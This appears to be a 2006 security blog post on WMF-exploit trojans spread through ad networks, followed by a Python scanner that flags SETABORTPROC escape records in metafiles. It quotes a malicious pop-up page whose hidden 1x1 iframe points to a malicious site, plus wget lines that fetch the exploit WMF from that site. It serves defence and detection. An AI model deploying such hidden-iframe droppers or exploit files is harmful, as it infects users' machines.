Jan 1st, 2006.

Apparently, trojan writers have seeded the ad networks with trojans that exploit the still-unpatched WMF vulnerability.

On Jan 1st I got my first WMF block alert from SurfControl.

Per the logs, I saw a user get a pop-up:
wget http://www9.paypopup.com/srp99/srp99.htm


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> srp99 </TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Description" CONTENT="">
</HEAD>

<BODY>
<IFRAME SRC=http://www.srp99.biz/cd/?affiliate=101 HEIGHT="1" WIDTH="1" FRAMEBORDER="0"><IFRAME>
</BODY>
</HTML>
The 1x1 iframe in that page then loaded a WMF file:

wget www.srp99.biz/tape/101.wmf


This WMF is detected as Worfo, also known as Bloodhound.Exploit.56 (Norton), TROJ_NASCENE.GEN (Trend), Exploit.Win32.IMG-WMF (Kaspersky), Exploit-WMF (McAfee), Exp/WMF-A (Sophos), Win32.Worfo, Win32/Worfo!Trojan and Win32/Worfo.Variant!Trojan.
Per http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=49998
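What all of those AV names are catching is the same thing: a metafile carrying a META_ESCAPE record whose escape function is SETABORTPROC (0x0009), the record GDI honours when it plays a WMF back and which the exploit uses to hand execution to bytes inside the file. The scanner below is an added example for this post, not the 101.wmf above and not anything from the vendors named: it walks the WMF record list and flags any SETABORTPROC escape. The record layouts are the documented WMF ones; the two sample files are constructed inline, and the "payload" in the bad one is inert filler, not shellcode. The offsets and field names in the result dicts are my own choice.

```python
"""Flag WMF files that carry a SETABORTPROC escape record.

Added example, not code from the original post. Record layouts follow the
Windows Metafile format; the sample files are constructed here.
"""
import struct

PLACEABLE_MAGIC = 0x9AC6CDD7   # Aldus placeable header key (optional 22-byte prefix)
META_EOF        = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE     = 0x0626
SETABORTPROC    = 0x0009       # escape function the exploit relies on


def parse_wmf_records(data):
    """Yield (offset, function, params) for every record in a WMF blob.

    Deliberately lenient: GDI never cared about the file extension and the
    in-the-wild samples did not always have a placeable header, so all we
    require is a plausible META_HEADER (type 1 or 2, header size 9 words).
    """
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data)[0] == PLACEABLE_MAGIC:
        off = 22
    if len(data) < off + 18:
        raise ValueError("too short for a META_HEADER")
    mt_type, hdr_words = struct.unpack_from("<HH", data, off)
    if mt_type not in (1, 2) or hdr_words != 9:
        raise ValueError("no WMF header at offset %d" % off)
    off += 18
    while off + 6 <= len(data):
        rd_words, func = struct.unpack_from("<IH", data, off)   # size is in 16-bit words
        rec_len = rd_words * 2
        if rec_len < 6:            # malformed size: stop instead of looping forever
            break
        yield off, func, data[off + 6:off + rec_len]
        if func == META_EOF:
            break
        off += rec_len


def scan_wmf(data):
    """Return a list of dicts, one per META_ESCAPE/SETABORTPROC record found."""
    hits = []
    for off, func, params in parse_wmf_records(data):
        if func == META_ESCAPE and len(params) >= 4:
            esc_func, byte_count = struct.unpack_from("<HH", params)
            if esc_func == SETABORTPROC:
                hits.append({"offset": off, "escape": esc_func,
                             "byte_count": byte_count,
                             "payload_len": len(params) - 4})
    return hits


def is_wmf(data):
    """Content sniff: True if the blob parses as a metafile at all."""
    try:
        for _ in parse_wmf_records(data):
            pass
        return True
    except ValueError:
        return False


# --- builders for the constructed samples --------------------------------

def wmf_record(func, params=b""):
    if len(params) % 2:
        params += b"\x00"      # records are sized in words, so pad odd params
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def setabortproc_record(payload):
    """The escape record shape the exploit used; payload here is caller's filler."""
    return wmf_record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, len(payload)) + payload)


def build_wmf(records, placeable=False):
    body = b"".join(records)
    max_words = max(len(r) // 2 for r in records)
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 0, max_words, 0)
    out = header + body
    if placeable:
        head = struct.pack("<IHhhhhHI", PLACEABLE_MAGIC, 0, 0, 0, 100, 100, 96, 0)
        checksum = 0
        for (w,) in struct.iter_unpack("<H", head):   # XOR of the first 10 words
            checksum ^= w
        out = head + struct.pack("<H", checksum) + out
    return out


# Constructed samples (not real files from the ad network).
BENIGN_SAMPLE = build_wmf([
    wmf_record(META_SETMAPMODE, struct.pack("<H", 8)),   # MM_ANISOTROPIC
    wmf_record(META_EOF),
], placeable=True)

_FILLER = b"A" * 16        # stands in for where shellcode would sit; inert
MALICIOUS_SAMPLE = build_wmf([
    wmf_record(META_SETMAPMODE, struct.pack("<H", 8)),
    setabortproc_record(_FILLER),
    wmf_record(META_EOF),
])

if __name__ == "__main__":
    print("benign:", scan_wmf(BENIGN_SAMPLE))
    print("malicious:", scan_wmf(MALICIOUS_SAMPLE))
```

Feed it everything the proxy or mail gateway lets through that sniffs as a metafile, not just *.wmf, since the viewer picked the file apart by content rather than by extension. A stored metafile has essentially no legitimate reason to carry a SETABORTPROC escape, so one hit is enough to block on; the byte count and payload length in the result tell you how much trailing data rode along with it.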
So I'd say watch out, world, it's about to get nasty.
ACMENEWS.COM LLC